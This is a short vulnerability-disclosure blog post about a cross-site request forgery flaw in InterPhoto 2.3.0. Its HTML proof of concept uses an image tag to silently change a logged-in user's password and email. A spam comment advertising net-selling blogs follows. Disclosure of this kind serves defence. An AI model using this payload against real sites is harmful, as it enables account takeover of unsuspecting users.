This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

InterPhoto 2.3.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC
<html>
<body>
<img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
</body>
</html>

2 comments:

  1. Nice article, thanks for the information. It's very complete information. I will bookmark for next reference
    jaring futsal | jaring golf | jaring pengaman proyek |
    jaring pengaman bangunan | jaring pengaman gedung
    http://www.jual-jaring.blogspot.com/
    http://www.agen-jaring.blogspot.com/
    http://www.pancasamudera-safetynet.blogspot.com/
    http://www.toko-jaring.blogspot.com/
    http://www.pusat-jaring.blogspot.com/
    http://jualjaringpengaman.blogspot.com/
    https://pancasamudera.wordpress.com/
    https://pasangjaringfutsal.wordpress.com/
    https://jualtambangmurah.wordpress.com/
    https://tokojaring.wordpress.com/
    https://jualjaringfutsal.wordpress.com/
    https://jaringfutsal.wordpress.com/

    ReplyDelete